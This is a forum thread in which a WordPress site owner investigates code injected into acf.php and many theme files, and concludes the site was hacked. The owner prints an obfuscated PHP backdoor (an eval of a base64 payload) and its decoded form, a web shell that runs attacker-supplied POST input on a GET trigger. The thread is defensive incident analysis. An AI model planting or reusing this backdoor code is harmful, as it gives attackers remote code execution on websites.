Home › Forums › General Issues › Bug or not in acf.php
Hello,
I synchronize Dropbox with my server, and i’m surprised about an update for acf.php.
I did a diff between the previous (on the left) and the new version (on the right), with lines of code added.
I checked the last version, and i found some more lines at the top.
I restored the previous version for acf.php
Can you tell me more ?
Please find the attached file
Thanks
There should not be any code up there. I did some looking but I found no information. My first reaction is that your site has been hacked. Do you have any other code on your site that should not be there?
Hello John,
I think that right and maybe it’s not a problem about your plugin (thinking because i just found yesterday “acf.php”
When i look for “$_POST[‘dd’]” in the directory, i have many more files modified more than 1 month…
I found these files :
wp-content/themes/yoo_balance_wp/comments.php
wp-content/themes/yoo_balance_wp/sidebar.php
wp-content/themes/yoo_balance_wp/changelog.php
wp-content/themes/yoo_balance_wp/404.php
wp-content/themes/yoo_balance_wp/footer.php
wp-content/themes/yoo_balance_wp/config.php
wp-content/themes/yoo_balance_wp/layouts/attachment.php
wp-content/themes/yoo_balance_wp/layouts/template.config.php
wp-content/themes/yoo_balance_wp/layouts/template.php
wp-content/themes/yoo_balance_wp/layouts/_post.php
wp-content/themes/yoo_balance_wp/layouts/page.php
wp-content/themes/yoo_balance_wp/layouts/page.php
wp-content/themes/yoo_balance_wp/layouts/module.php
wp-content/themes/yoo_balance_wp/layouts/single.php
wp-content/themes/yoo_balance_wp/header.php
wp-content/themes/yoo_balance_wp/index.php
wp-content/themes/yoo_balance_wp/functions.php
wp-content/themes/yoo_balance_wp/functions.php
wp-content/themes/yoo_balance_wp/cache/index.php
About :
/home/www/podologue/wp-content/themes/yoo_balance_wp/functions.php
I found at the beginning
<?php
$O00OO0 = urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");
$O00O0O = $O00OO0{3} . $O00OO0{6} . $O00OO0{33} . $O00OO0{30};
$O0OO00 = $O00OO0{33} . $O00OO0{10} . $O00OO0{24} . $O00OO0{10} . $O00OO0{24};
$OO0O00 = $O0OO00{0} . $O00OO0{18} . $O00OO0{3} . $O0OO00{0} . $O0OO00{1} . $O00OO0{24};
$OO0000 = $O00OO0{7} . $O00OO0{13};
$O00O0O .= $O00OO0{22} . $O00OO0{36} . $O00OO0{29} . $O00OO0{26} . $O00OO0{30} . $O00OO0{32} . $O00OO0{35} . $O00OO0{26} . $O00OO0{30};
eval($O00O0O("JE8wTzAwMD0iUHh0RFFxZnpZYWhtd0N2Wk51
QmpMWHNNVWtJS0piSEVXT2dGeVZBU0dpUm5sVGRjcm9wZU5GU0JIREpreFViS1lDc0VHWHRmakl3cW5ocEF6Z1JsV1Z2ZW9UeW1hdUxkaU9yY1BaUU1OQjlZVVJ5R0N1TEtyV1NGcEIwdkhDTEpMMFRuV29yS3JXU0Z6MTA3cGFpS0F
DTEtyV1NGcEIwOXBDcjB6b2k3RVdHWmdvYnlFSUViZ0N2aEkxdE5uMUxnejJFMXgyUzVnM24wcWtwRnoxMFFBT1NpTWFpMFYzMEdDS1RmVWE4dnhJdFFuS1RGcldUa3JDdlFWWTBBRWRUWHgzTFFnMjR2eEl0UW5LVEZyV1RrckN2UU
1ZMEFDV2lLQWx5aEkwcmVUZXdkZzN5ZElteTlObXlkeDJiaXgyd2RBSDBBQ0hpN0JIWnpDbXRvRUlMMWNLNHZwS0dzZ0s1aXgzTER4SzFzcktUUWMyOVBwZndHQ3ZoenBhVDRVSUhaQU93R0N2aHZwQ3l2SkgwQUpIMEFOazQ9Ijtld
mFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw=="));
?>
That’s mean
<?php
$fukq = @$_GET['fukq']; if($fukq == 't'){echo(@eval($_POST['fuckyou4321']));exit;}
echo apiRequest();
function apiRequest(){
if(@$_GET['op'] == 'check')
{
return "connectjbmoveisok";
exit();
}
}
?>
So i think it’s not the good place, and it’s not your plugin.
Sorry for the time you lost !
I continue to analyse
On this website :
http://gotmls.net/support-topic/wp-site-guardian-warnings/
When i look for “fuckyou4321”, i found :
[code]
Parameter: POST.fuckyou4321
Data: echo (123454320+1);exit();
Impact: 7/91
Potential Vectors: Cross Site Scripting, Cross Site Request Forgery, Remote File Execution, Local File Inclusion
[/code]
If i take my last backup, the 18th december 2017 (i’m going to restore, i don’t know if a backdoor is added), i don’t find the line with $_POST[‘dd’], and my infected version on dropbox is from 18th january 2017 (oldest)
The oldest log for apache in /var/log/apache2, is from the 25th february, so it’s impossible to check the request with GET parameter… 🙁
So it’s a hack of my website
I’m going to install Apache mod to get all informations about requests out / in for GET / POST.
If i’m hack again, i will get all informations and the available page with the bug for the XSS, hoping…
http://httpd.apache.org/docs/2.4/mod/mod_dumpio.html
You must be logged in to reply to this topic.
Welcome to the Advanced Custom Fields community forum.
Browse through ideas, snippets of code, questions and answers between fellow ACF users
Helping others is a great way to earn karma, gain badges and help ACF development!
🚀 This week’s session of ACF Chat Fridays dips into the preliminary results of our first ever user survey. Don’t miss it! https://t.co/3UtvQbDwNm pic.twitter.com/kMwhaJTkZc
— Advanced Custom Fields (@wp_acf) May 9, 2023
© 2023 Advanced Custom Fields.
We use cookies to offer you a better browsing experience, analyze site traffic and personalize content. Read about how we use cookies and how you can control them in our Cookie Policy. If you continue to use this site, you consent to our use of cookies.